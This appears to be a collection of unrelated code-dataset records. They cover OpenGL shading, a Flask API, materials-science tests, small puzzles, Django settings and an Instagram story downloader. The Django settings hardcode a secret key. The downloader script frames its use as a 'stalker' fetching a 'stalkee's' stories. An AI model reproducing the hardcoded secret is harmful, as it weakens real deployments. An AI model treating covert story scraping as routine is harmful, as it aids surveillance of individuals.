ciclicamente de flat para Gouraud para Phong, e a tecla space muda a forma\n de esfera para cilindro para chaleira.\n'''\n\ndef get_input(window, shape, flags):\n if glfw.get_key(window, glfw.KEY_LEFT) == glfw.PRESS:\n if glfw.get_key(window, glfw.KEY_S) == glfw.PRESS:\n shape.material.specular_constant -= 0.001\n if shape.material.specular_constant <= 0:\n shape.material.specular_constant = 0\n \n if glfw.get_key(window, glfw.KEY_R) == glfw.PRESS:\n shape.material.albedo[0] -= 0.01\n if shape.material.albedo[0] <= 0:\n shape.material.albedo[0] = 0\n \n if glfw.get_key(window, glfw.KEY_G) == glfw.PRESS:\n shape.material.albedo[1] -= 0.01\n if shape.material.albedo[1] <= 0:\n shape.material.albedo[1] = 0\n \n if glfw.get_key(window, glfw.KEY_B) == glfw.PRESS:\n shape.material.albedo[2] -= 0.01\n if shape.material.albedo[2] <= 0:\n shape.material.albedo[2] = 0\n \n if glfw.get_key(window, glfw.KEY_RIGHT) == glfw.PRESS:\n if glfw.get_key(window, glfw.KEY_S) == glfw.PRESS:\n shape.material.specular_constant += 0.001\n if shape.material.specular_constant >= 1:\n shape.material.specular_constant = 1\n \n if glfw.get_key(window, glfw.KEY_R) == glfw.PRESS:\n shape.material.albedo[0] += 0.01\n if shape.material.albedo[0] >= 1:\n shape.material.albedo[0] = 1\n \n if glfw.get_key(window, glfw.KEY_G) == glfw.PRESS:\n shape.material.albedo[1] += 0.01\n if shape.material.albedo[1] >= 1:\n shape.material.albedo[1] = 1\n \n if glfw.get_key(window, glfw.KEY_B) == glfw.PRESS:\n shape.material.albedo[2] += 0.01\n if shape.material.albedo[2] >= 1:\n shape.material.albedo[2] = 1\n \n if glfw.get_key(window, glfw.KEY_ENTER) == glfw.PRESS and not flags[0]:\n if shape.material.shading_type == 'flat':\n shape.material.shading_type = 'gouraud'\n elif shape.material.shading_type == 'gouraud':\n shape.material.shading_type = 'phong'\n elif shape.material.shading_type == 'phong':\n shape.material.shading_type = 'flat'\n flags[0] = True\n \n if glfw.get_key(window, glfw.KEY_ENTER) == glfw.RELEASE:\n flags[0] = False\n\n if glfw.get_key(window, glfw.KEY_SPACE) == glfw.PRESS and not flags[1]:\n if shape.shape_type == 'sphere':\n shape.shape_type = 'cylinder'\n elif shape.shape_type == 'cylinder':\n shape.shape_type = 'teapot'\n elif shape.shape_type == 'teapot':\n shape.shape_type = 'sphere'\n flags[1] = True\n \n if glfw.get_key(window, glfw.KEY_SPACE) == glfw.RELEASE:\n flags[1] = False\n\n\n#%%\n'''\n Chegando à função main(), podemos fazer algumas considerações finais.\n \n Percebe-se que o resultado do flat shading é o esperado, com o triangulado que é característico, o que faz com que\n a luz especular seja \"quebrada\" entre as formas das faces por conta da sua uniformidade na face. Percebe-se também\n que o Gourand shading, por mais que tenha sido revolucionário para a sua época, não funciona tão bem quanto o Phong\n shading.\n\n Isso se pode observar claramente por exemplo na forma de cilindro, onde as partes sombreadas e com incidência de luz\n especular são quebradas. Isso ocorre porque a interpolação linear entre as cores dos vértices pode ter discontinui-\n dades, ao contrário de como seria a partir do momento em que se considera a normal interpolada de cada pixel, como\n no Phong shading, que não apresenta os problemas mencionados anteriormente.\n \n Podemos concluir assim que o modelo de iluminação de Phong é um modelo de implementação simples e com uma aparência\n aceitável, porém que ainda tem muitos problemas. Nenhum dos objetos parece de fato muito realista, e isso se deve a\n diversos fatores. Em primeiro lugar, eles são muito \"lisos\", e isso é porque as suas normais são muito uniformes. Na\n realidade, as superfícies são mais rugosas que estas. Para resolver este problema, uma possível melhoria que não\n está no escopo deste trabalho é a implementação de texturização e bump mapping, para incrementar a rugosidade da\n superfície. Além disso, com o poder computacional de hoje em dia, podemos fazer materiais melhores usando modelos\n que não são de Phong, como o PBR [https://en.wikipedia.org/wiki/Physically_based_rendering]. Mesmo assim, didatica-\n mente, os materiais de Phong por sua simplicidade têm um grande valor na academia.\n'''\n\ndef main():\n if not glfw.init():\n return\n window = glfw.create_window(1280, 760, 'Shadings', None, None)\n if not window:\n glfw.terminate()\n return\n \n glfw.make_context_current(window)\n \n glClearColor(0.2, 0.3, 0.2, 1.0)\n glEnable(GL_DEPTH_TEST)\n glCullFace(GL_BACK)\n \n shader = shaders.compileProgram(shaders.compileShader(vertex_shader, GL_VERTEX_SHADER), shaders.compileShader(fragment_shader, GL_FRAGMENT_SHADER))\n shape = Shape('sphere', PhongMaterial(shader, 'flat', .0, .5, .5, 0.05)) # valores default iniciais\n key_flags = [False, False]\n \n while not glfw.window_should_close(window):\n glfw.poll_events()\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n get_input(window, shape, key_flags)\n shape.render()\n glfw.swap_buffers(window)\n glfw.terminate()\n \nif __name__ == '__main__':\n main()\n\n\n#%%\n\n\n\n","sub_path":"tp1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"434391474","text":"# ===============================================================================\n# Copyright 2011 Jake Ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ===============================================================================\n\n# ============= enthought library imports =======================\nfrom traits.api import HasTraits, Instance\nfrom traitsui.api import View, Item\n# ============= standard library imports ========================\n\n# ============= local library imports ==========================\nfrom pychron.modeling.model_data_directory import ModelDataDirectory\n\n# ============= views ===================================\nclass InfoView(HasTraits):\n data_directory = Instance(ModelDataDirectory)\n\n def selected_update(self, obj, name, old, new):\n if not isinstance(new, ModelDataDirectory):\n try:\n new = new[0]\n except (IndexError, TypeError):\n return\n self.data_directory = new\n\n def traits_view(self):\n v = View(\n Item('data_directory',\n style='custom',\n show_label=False),\n )\n return v\n","sub_path":"pychron/modeling/plugins/info_view.py","file_name":"info_view.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"236060914","text":"#!/usr/bin/python3\n\"\"\" Creates a view for linked Place/Amenity objects \"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, request\nfrom models import storage\nfrom models.place import Place\nfrom models.amenity import Amenity\nfrom os import getenv\n\n\n@app_views.route(\"/places//amenities\", methods=[\"GET\"],\n strict_slashes=False)\ndef places_get(place_id):\n \"\"\" Route retrieves Amenity objects connected to a Place object \"\"\"\n place = storage.get(Place, place_id)\n if place is None:\n abort(404)\n if request.method == \"GET\":\n list_amenities = []\n if getenv(\"HBNB_TYPE_STORAGE\") == \"db\":\n for item in place.amenities:\n print(item)\n list_amenities.append(item.to_dict())\n else:\n for item in place.amenity_ids:\n list_amenities.append(storage.get(Amenity, item).to_dict())\n return jsonify(list_amenities)\n\n\n@app_views.route(\"/places//amenities/\",\n methods=[\"DELETE\", \"POST\"],\n strict_slashes=False)\ndef amenities_delete_post(place_id, amenity_id):\n \"\"\" Route deletes or updates an Amenity object \"\"\"\n place = storage.get(Place, place_id)\n if place is None:\n abort(404)\n amenity = storage.get(Amenity, amenity_id)\n if amenity is None:\n abort(404)\n if request.method == \"DELETE\":\n if getenv(\"HBNB_TYPE_STORAGE\") == \"db\":\n if amenity not in place.amenities:\n abort(404)\n place.amenities.remove(amenity)\n else:\n if amenity.id not in place.amenity_ids:\n abort(404)\n place.amenity_ids.remove(amenity.id)\n place.save()\n return jsonify({}), 200\n else:\n if getenv(\"HBNB_TYPE_STORAGE\") == \"db\":\n if amenity in place.amenities:\n return jsonify(amenity.to_dict()), 200\n place.amenities.append(amenity)\n else:\n if amenity_id in place.amenity_ids:\n return jsonify(amenity.to_dict()), 200\n place.amenity_ids.append(amenity_id)\n place.save()\n return jsonify(amenity.to_dict()), 201\n","sub_path":"api/v1/views/places_amenities.py","file_name":"places_amenities.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"73977752","text":"\"\"\"\n=================== TASK 5 ====================\n* Name: Average Value\n*\n* Write a function `averageval` that will take a\n* integer list as an argument and return the \n* average value of the list elements. \n*\n* Note: Please describe in details possible cases\n* in which your solution might not work. It is not\n* allowed to use built-in functions.\n*\n* Use main() function to test your solution.\n===================================================\n\"\"\"\ndef averageval(numlist):\n numberOfElements = len(numlist)\n i = 0\n sum = 0\n while i < len(numlist):\n sum = sum + numlist[i]\n i = i + 1\n return sum / numberOfElements\n\ndef main():\n numlist = [1, 2, 3, 4, 5]\n avg = averageval(numlist)\n print(\"Average val is: \", avg)\nmain()","sub_path":"task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"613673269","text":"import numpy as np\n\nfrom pymatgen.analysis.defects.supercells import (\n _ase_cubic,\n get_matched_structure_mapping,\n get_sc_fromstruct,\n)\n\n\ndef test_supercells(gan_struct):\n uc = gan_struct.copy()\n sc_mat = get_sc_fromstruct(uc)\n sc = uc * sc_mat\n assert sc_mat.shape == (3, 3)\n\n sc_mat2, _ = get_matched_structure_mapping(uc, sc)\n assert sc_mat2.shape == (3, 3)\n sc2 = uc * sc_mat2\n np.testing.assert_allclose(\n sc.lattice.abc, sc2.lattice.abc\n ) # the sc_mat can be reconstructed from the sc\n\n\ndef test_ase_supercells(gan_struct):\n sc_mat = _ase_cubic(gan_struct, min_atoms=4, max_atoms=8)\n sc = gan_struct * sc_mat\n assert 4 <= sc.num_sites <= 8\n","sub_path":"tests/test_supercells.py","file_name":"test_supercells.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"5693733","text":"#!/usr/bin/env python\n\nimport numpy as np\n\n\nclass Recommender(object):\n\n def fit(self, URM_train):\n\n self.URM_train = URM_train\n\n itemPopularity = (URM_train>0).sum(axis=0)\n itemPopularity = np.array(itemPopularity).squeeze()\n\n # We are not interested in sorting the popularity value,\n # but to order the items according to it\n self.popularItems = np.argsort(itemPopularity)\n self.popularItems = np.flip(self.popularItems, axis = 0)\n\n\n def recommend(self, topRemoved=5):\n\n recommended_items = self.popularItems[0:topRemoved]\n\n return recommended_items\n","sub_path":"recommender_system/classes/recommenders/TopPopRecMod.py","file_name":"TopPopRecMod.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"283049317","text":"\"\"\" Lab 6 System Animation\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\nfrom muscle_system import MuscleSystem\n\n\nclass SystemAnimation(object):\n \"\"\" SystemAnimation\n\n \"\"\"\n\n def __init__(\n self,\n res_sys,\n pendulum_sys,\n muscle_sys,\n neural_sys=None,\n fps=50\n ):\n super(SystemAnimation, self).__init__()\n\n self.pendulum_sys = pendulum_sys\n self.muscle_sys = muscle_sys\n self.neural_sys = neural_sys\n self.time = res_sys[:, 0]\n self.state = res_sys[:, 1:]\n\n # Define positions for neurons\n self.neurons_pos = np.asarray([[-.5, .5],\n [.5, .5],\n [-0.25, 0.25],\n [0.25, 0.25]])\n self.fps = fps\n self.fig, self.ax = plt.subplots(num=\"Simulation\")\n\n self.anims = self.animation_objects()\n t_max = self.time[-1]\n dt = 1 / float(fps)\n\n self.anim_link = animation.FuncAnimation(\n self.fig, self._animate, np.arange(0, t_max, dt),\n interval=1e3 / float(fps), blit=True\n )\n plt.title(\"LAB 6 : Neuromuscular simulation\")\n plt.axis('scaled')\n # plt.axis('off')\n self.ax.axes.xaxis.set_visible(False)\n self.ax.axes.yaxis.set_visible(False)\n self.ax.set_frame_on('True')\n limit = 1.25 * self.pendulum_sys.parameters.L\n if limit < 0.5:\n limit = .5\n plt.axis([-limit, limit,\n -1.5*limit, limit])\n plt.grid(False)\n return\n\n def animation_objects(self):\n \"\"\" Create and return animation objects \"\"\"\n\n blue = (0.0, 0.3, 1.0, 1.0)\n\n # Origin\n self.ax.plot(\n [0, ], [-1, ], color='k', marker='o', markersize=12.5,\n zorder=4\n )\n\n # Pendulum\n pendulum = self.pendulum_sys.pose()\n self.line, = self.ax.plot(\n pendulum[:, 0],\n pendulum[:, 1] - 1.0,\n color=blue,\n linewidth=5,\n animated=True,\n zorder=1\n )\n # Mass\n self.m, = self.ax.plot(\n self.pendulum_sys.origin[0], self.pendulum_sys.parameters.L-1,\n color=blue, marker='o', markersize=12.5, animated=True\n )\n # Base\n self.ax.plot(\n [0.0, 0.0], [-1, 0], c='g', linewidth=7.5\n )\n\n # Muscles\n self.muscle_sys.update_attachment_position(self.state[0, 0])\n\n muscles = [\n self.ax.plot(\n m[:, 0], m[:, 1], color='r', linewidth=3.5, animated=True\n )[0]\n for m in [\n self.muscle_sys.muscle_1_pos_curr,\n self.muscle_sys.muscle_2_pos_curr,\n ]\n ]\n\n # Time\n time = self.ax.text(\n -0.2, 1.05, \"Time: 0.0\", fontsize=14, animated=True\n )\n\n # Neurons\n if self.neural_sys is not None:\n neurons = [self.ax.scatter(\n self.neurons_pos[:, 0], self.neurons_pos[:, 1],\n s=np.ones(4) * 350, c='r', animated=True, alpha=0.5)]\n for n in range(4):\n self.ax.text(\n self.neurons_pos[n, 0], self.neurons_pos[n, 1],\n \"N{}\".format(n+1), fontsize=11, animated=False,\n zorder=10, horizontalalignment='center',\n verticalalignment='center'\n )\n\n #: connections\n weights = (np.asarray(self.neural_sys.w)).T\n connections = np.nonzero(weights)\n for i, j in zip(connections[0], connections[1]):\n weight = weights[i, j]\n color = \"red\" if weight < 0.0 else \"green\"\n start = [self.neurons_pos[j, 0], self.neurons_pos[j, 1]]\n end = [self.neurons_pos[i, 0], self.neurons_pos[i, 1]]\n SystemAnimation.draw_arrow(\n self.ax, start, end, color=color)\n start = [self.neurons_pos[0, 0], self.neurons_pos[0, 1]]\n end = [self.neurons_pos[0, 0], self.neurons_pos[0, 1]]\n handle1 = SystemAnimation.draw_arrow(\n self.ax, start, end, color=\"green\")\n start = [self.neurons_pos[1, 0], self.neurons_pos[1, 1]]\n end = [self.neurons_pos[1, 0], self.neurons_pos[1, 1]]\n handle2 = SystemAnimation.draw_arrow(\n self.ax, start, end, color=\"green\",\n connectionstyle=\"arc3,rad=-0.3\"\n )\n return (\n [self.line, self.m] + muscles + [time] +\n neurons + [handle1] + [handle2]\n )\n return [self.line, self.m] + muscles + [time]\n\n @staticmethod\n def draw_arrow(ax, start, end, **kwargs):\n \"\"\" Draw arrow. \"\"\"\n handle = ax.annotate(\n \"\",\n xy=(start[0], start[1]),\n xycoords='data',\n xytext=(end[0], end[1]),\n textcoords='data',\n arrowprops=dict(arrowstyle=\"->\",\n color=kwargs.pop(\"color\", \"0.5\"),\n shrinkA=5, shrinkB=5,\n patchA=None, patchB=None,\n connectionstyle=kwargs.pop(\n \"connectionstyle\", \"arc3,rad=0.3\")\n ),\n )\n return handle\n\n @staticmethod\n def animate():\n \"\"\"Animate System\"\"\"\n plt.show()\n return\n\n def _animate(self, time):\n \"\"\" Animation \"\"\"\n index = np.argmin((self.time - time)**2)\n self.pendulum_sys.theta = self.state[index, 0]\n pendulum = self.pendulum_sys.pose()\n\n # Pendulum\n self.anims[0].set_xdata(pendulum[:, 0])\n self.anims[0].set_ydata(pendulum[:, 1]-1)\n\n # Mass\n self.anims[1].set_xdata([pendulum[1, 0]])\n self.anims[1].set_ydata([pendulum[1, 1] - 1])\n\n # Muscles\n self.muscle_sys.update_attachment_position(self.state[index, 0])\n muscles = [\n self.muscle_sys.muscle_1_pos_curr,\n self.muscle_sys.muscle_2_pos_curr,\n ]\n activations = [self.state[index, 2], self.state[index, 4]]\n for i, musc in enumerate(self.anims[2:4]):\n musc.set_color((activations[i], 0.0, 0.0, 1.0))\n musc.set_xdata(muscles[i][:, 0])\n musc.set_ydata(muscles[i][:, 1] - 1)\n\n # Text\n self.anims[4].set_text(\"Time: {:.1f}\".format(self.time[index]))\n\n # Neurons\n if self.neural_sys is not None:\n n_rate = self.neural_sys.n_act(self.state[index, 6:])\n self.anims[5].set_color(\n np.asarray([[0.0, n_rate[0], 0.0, 1.0],\n [0.0, n_rate[1], 0.0, 1.0],\n [0.0, n_rate[2], 0.0, 1.0],\n [0.0, n_rate[3], 0.0, 1.0]]))\n # self.anims[5].set_sizes(np.ones(4) * 250)\n self.anims[5].set_offsets(self.neurons_pos)\n p1 = (\n self.muscle_sys.muscle_1_pos_curr[0, :] +\n self.muscle_sys.muscle_1_pos_curr[1, :]\n )*0.5\n p2 = (\n self.muscle_sys.muscle_2_pos_curr[0, :] +\n self.muscle_sys.muscle_2_pos_curr[1, :]\n )*0.5\n self.anims[6].xy = (p1[0], p1[1]-1)\n self.anims[7].xy = (p2[0], p2[1]-1)\n return self.anims\n\n","sub_path":"Lab6/Python/system_animation.py","file_name":"system_animation.py","file_ext":"py","file_size_in_byte":7535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"504366038","text":"import time\n\nstart = time.clock()\n\n\ndef binarySearch(alist, item):\n first = 0\n last = len(alist)-1\n found = False\n\n while first<=last and not found:\n midpoint = (first + last)//2\n if alist[midpoint] == item:\n found = True\n else:\n if item < alist[midpoint]:\n last = midpoint-1\n else:\n first = midpoint+1\n\n return found\n\n\ndef gen_primes():\n \"\"\" Generate an infinite sequence of prime numbers.\n \"\"\"\n # Maps composites to primes witnessing their compositeness.\n # This is memory efficient, as the sieve is not \"run forward\"\n # indefinitely, but only as long as required by the current\n # number being tested.\n #\n D = {}\n\n # The running integer that's checked for primeness\n q = 2\n\n while True:\n if q not in D:\n # q is a new prime.\n # Yield it and mark its first multiple that isn't\n # already marked in previous iterations\n #\n yield q\n D[q * q] = [q]\n else:\n # q is composite. D[q] is the list of primes that\n # divide it. Since we've reached q, we no longer\n # need it in the map, but we'll mark the next\n # multiples of its witnesses to prepare for larger\n # numbers\n #\n for p in D[q]:\n D.setdefault(p + q, []).append(p)\n del D[q]\n\n q += 1\n\n#generate the xth prime number\ndef prime_lim(limit):\n i = 1\n for next_prime in gen_primes():\n\n if i > limit:\n print(last_prime)\n print(next_prime)\n return\n last_prime = next_prime\n i = i + 1\n\n\ndef export_prime_lim(limit):\n vector = []\n for next_prime in gen_primes():\n\n if next_prime > limit:\n return vector\n vector.append(next_prime)\n\n\nvalue = 1000000\nprimes = export_prime_lim(value)\n\ncumul_primes = [0]\ntemp = 0\nfor i in range(0,len(primes)):\n temp += primes[i]\n cumul_primes.append(temp)\n\nmaxval = 0\nmaxlen = 0\n\nfor i in range(0,len(cumul_primes)):\n\n for j in range(i,0,-1):\n temp = cumul_primes[i] - cumul_primes[j]\n #if temp in primes:\n if (j == 0 and (i - j) % 2 == 0) or (j > 0 and (i - j) % 2 == 1):\n if binarySearch(primes, temp):\n if i - j > maxlen:\n maxlen = i - j\n maxval = temp\n\n if (cumul_primes[i] - cumul_primes[j]) > value:\n break\n\nprint(maxlen)\nprint(maxval)\n\n\nend = time.clock()\n\nprint(\"time = {} seconds\".format(round(end - start, 3)))\n","sub_path":"p50 consec prime sum.py","file_name":"p50 consec prime sum.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"581805845","text":"#Django settings for blog project.\n\nimport mongoengine\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nSECRET_KEY = '(ena%dz&990zlr(-!si=lhg5uts5fj6%defy7scu^t=k&+hmkz'\n\nDEBUG = False\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = ['*']\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nAUTHENTICATION_BACKENDS = (\n 'mongoengine.django.auth.MongoEngineBackend',\n)\n\nROOT_URLCONF = 'blog.urls'\n\nWSGI_APPLICATION = 'blog.wsgi.application'\n\n# Database\n\nSESSION_ENGINE = 'mongoengine.django.sessions'\n_MONGODB_USER = os.environ['MONGODB_USER']\n_MONGODB_PASSWD = os.environ['MONGODB_PASSWD']\n_MONGODB_HOST = os.environ['MONGODB_HOST']\n_MONGODB_NAME = os.environ['MONGODB_NAME']\n_MONGODB_DATABASE_HOST = 'mongodb://%s:%s@%s/%s' % (_MONGODB_USER, _MONGODB_PASSWD, _MONGODB_HOST, _MONGODB_NAME)\n\nmongoengine.connect(_MONGODB_NAME, host=_MONGODB_DATABASE_HOST)\n\n# Internationalization\n\nLANGUAGE_CODE = 'es-CO'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Template files\n\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR,'./templates'),\n)\n\n# Static files (CSS, JavaScript, Images)\n\nSTATIC_URL = '/static/'\n\nMEDIA_URL = '/media/'\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR,'./static'),\n)\n\nif not DEBUG:\n AWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']\n AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\n AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\n DEFAULT_FILE_STORAGE = 'londonbridgepub.s3utils.MediaRootS3BotoStorage'\n STATICFILES_STORAGE = 'londonbridgepub.s3utils.StaticRootS3BotoStorage'\n S3_URL = 'http://%s.s3.amazonaws.com/' % AWS_STORAGE_BUCKET_NAME\n STATIC_URL = S3_URL + 'static/'\n MEDIA_URL = S3_URL + 'media/'","sub_path":"blog/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"10159861","text":"from functools import reduce\nfrom collections import defaultdict\nfrom collections import deque\nimport math\n\ndef btf(i,d,N):\n q = deque()\n q.append(i)\n dist = [-1]*N\n dist[i] = 0\n i = 1\n while q:\n l = len(q)\n for j in range(l):\n next_node = q.popleft()\n for succ in d[next_node]:\n if dist[succ] == -1:\n dist[succ] = i\n q.append(succ)\n i +=1\n return dist\n\ndef main():\n # 文字列の2進数を数値にする\n # '101' → '5'\n # 文字列の頭に'0b'をつけてint()にわたす\n # binary = int('0b'+'101',0)\n\n # 2進数で立っているbitを数える\n # 101(0x5) → 2\n # cnt_bit = bin(5).count('1')\n \n # N! を求める\n # f = math.factorial(N)\n\n # N の逆元\n # N_inv = pow(N,MOD-2,MOD)\n\n # nCr\n # Nの階乗 * rの階乗の逆元 * n-rの階乗の逆元\n \n # 切り捨て\n # 4 // 3\n # 切り上げ\n #-(-4 // 3)\n \n # 初期値用:十分大きい数(100億)\n INF = float(\"inf\")\n\n # 大きな素数\n MOD = 10**9+7\n \n # 1文字のみを読み込み\n # 入力:2\n # a = input().rstrip()\n # 変数:a='2'\n \n # スペース区切りで標準入力を配列として読み込み\n # 入力:2 4 5 7\n # a, b, c, d = (int(_) for _ in input().split()) \n # 変数:a=2 b=4 c=5 d =7\n \n # 1文字ずつ標準入力を配列として読み込み\n # 入力:2 4 5 7\n # a = list(int(_) for _ in input().split())\n # 変数:a = [2, 4, 5, 7] \n\n # 1文字ずつ標準入力を配列として読み込み\n # 入力:2457\n # a = list(int(_) for _ in input())\n # 変数:a = [2, 4, 5, 7] \n N,M = (int(_) for _ in input().split())\n d = defaultdict(list)\n \n for i in range(M):\n s1,s2 = (int(_) for _ in input().split())\n d[s1-1].append(s2-1)\n d[s2-1].append(s1-1)\n\n dist = btf(0,d,N)\n\n if dist[N-1] == 2:\n print('POSSIBLE')\n else:\n print('IMPOSSIBLE')\n \nif __name__ == '__main__':\n main()\n","sub_path":"ABC/068/C/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"469295250","text":"''' problem - https://programmers.co.kr/learn/courses/30/lessons/42587\n 프린터\n \n This problem is related with stack and queue\n'''\n\ndef solution(priorities, location):\n '''Key point: get max from the priorities, compare the first element of the list\n -> First element is largest number, it goes remove from the list.\n -> First element is location, end the loop.\n -> First element is not largest number, it goes to to end of the list.\n -> First element is location, location goes to end of the list.\n '''\n\n key = priorities[location]\n result = 0\n while True:\n max_number = max(priorities)\n if key == max_number and location == 0:\n result += 1\n break\n if priorities[0] == max_number:\n priorities.remove(priorities[0])\n location -= 1\n result += 1\n elif location == 0 and key < max_number:\n priorities.append(priorities.pop(0))\n location = len(priorities) - 1 \n elif location > 0 and priorities[0] <= max_number:\n priorities.append(priorities.pop(0))\n location -= 1\n\n return result","sub_path":"이진호/day02/day02_200901.py","file_name":"day02_200901.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"500262558","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 15 15:22:50 2016\r\n\r\n@author: sbbk529\r\n\"\"\"\r\n\r\nimport datetime\r\nimport mysql.connector\r\n\r\ncnx = mysql.connector.connect(user='root',host='127.0.0.1',database='enrondb')\r\n\r\ncursor = cnx.cursor()\r\n\r\nfirstNames = [\"kenneth\", \"jeffrey\", \"andrew\", \"richard\", \"micheal\", \"lea\", \"ben\", \"dave\", \"mark\"]\r\n\r\nlastNames = [\"lay\", \"skilling\", \"fastow\", \"causay\", \"kapper\", \"fastow\", \"glisan\", \"delainey\", \"koenig\"]\r\n\r\nkeywords = [\"FERC\", \"Affair\", \"Devastating\", \"Investigation\", \"Disclosure\", \"Bonus\", \"Meeting\", \"Plan\", \"Services\", \"Report\"]\r\n\r\nfor i in range(0,len(firstNames)):\r\n \r\n queryText = \"SELECT Email_id FROM employeelist WHERE LOWER(firstName) LIKE \\\"%\"\r\n queryText += firstNames[i] + \"%\\\" AND LOWER(lastName) LIKE \\\"%\" \r\n queryText += lastNames[i] + \"%\\\"\"\r\n query = (queryText)\r\n \r\n queryText = \"SELECT COUNT(sender) FROM message WHERE LOWER(sender) LIKE \\\"%\"\r\n queryText += firstNames[i] + \"%\\\" AND LOWER(sender) LIKE \\\"%\" \r\n queryText += lastNames[i] + \"%\\\"\"\r\n query = (queryText)\r\n \r\n# queryText = \"SELECT COUNT(rvalue) FROM recipientinfo WHERE LOWER(rvalue) LIKE \\\"%\"\r\n# queryText += firstNames[i] + \"%\\\" AND LOWER(rvalue) LIKE \\\"%\" \r\n# queryText += lastNames[i] + \"%\\\"\"\r\n# query = (queryText)\r\n\r\n cursor.execute(query)\r\n \r\n \r\n for (Email_id) in cursor:\r\n print(str(i) +\" \" +firstNames[i] + \" \" + lastNames[i] + \" \" + str(Email_id))\r\n\r\ncursor.close()\r\ncnx.close()","sub_path":"Enron Datasets/SQL Queries/2016.07.17 - EnronDataQueries/2016.07.17 - EnronDataQueries/mySQL_connect.py","file_name":"mySQL_connect.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"449289740","text":"# import the necessary packages\nimport argparse\nimport instaloader\n \n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-l\", \"--login\", required=True, help=\"Login of the stalker.\")\nap.add_argument(\"-u\", \"--user\", required=True, help=\"Username of the stalkee.\")\nargs = vars(ap.parse_args())\n\n# Get instance\nL = instaloader.Instaloader()\n\n# Optionally, login or load session\nL.interactive_login(args[\"login\"])\n\n# Download only the stories of the user.\nL.download_profile(args[\"user\"], profile_pic=False, download_stories_only=True)\n\n# fast_update=True doesn't work for some reason. If it did, it would only download the stuff that it doesn't has. It only works in stories.\n","sub_path":"playground/downloadStory.py","file_name":"downloadStory.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"495753386","text":"# Test a Grayscale CNN model on image simulated to represent different lighting conditions\n# Without Grey-Edge Filtering\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nnp.set_printoptions(precision=2)\nfrom transform import grey_edge\n\n# Open the CNN model\nmodel = keras.models.load_model('models/ge-model.h5') \n\n# Test the model on each lighting scenario and record its outputs\nepochs = ['', '_gamma0', '_gamma4'] #, '_dark', '_light']\noutputs = []\nfor i,epoch in enumerate(epochs):\n outputs.append([])\n source = cv2.VideoCapture('epoch/test/Car_test{}.avi'.format(epoch))\n while True:\n ret, frame = source.read()\n if not ret:\n break\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frame = cv2.cvtColor(frame, cv2.COLOR_GRAY2BGR) \n #print(frame*255)\n #quit()\n frame = cv2.resize(frame, (200,66))\n frame = np.expand_dims(frame, 0)\n 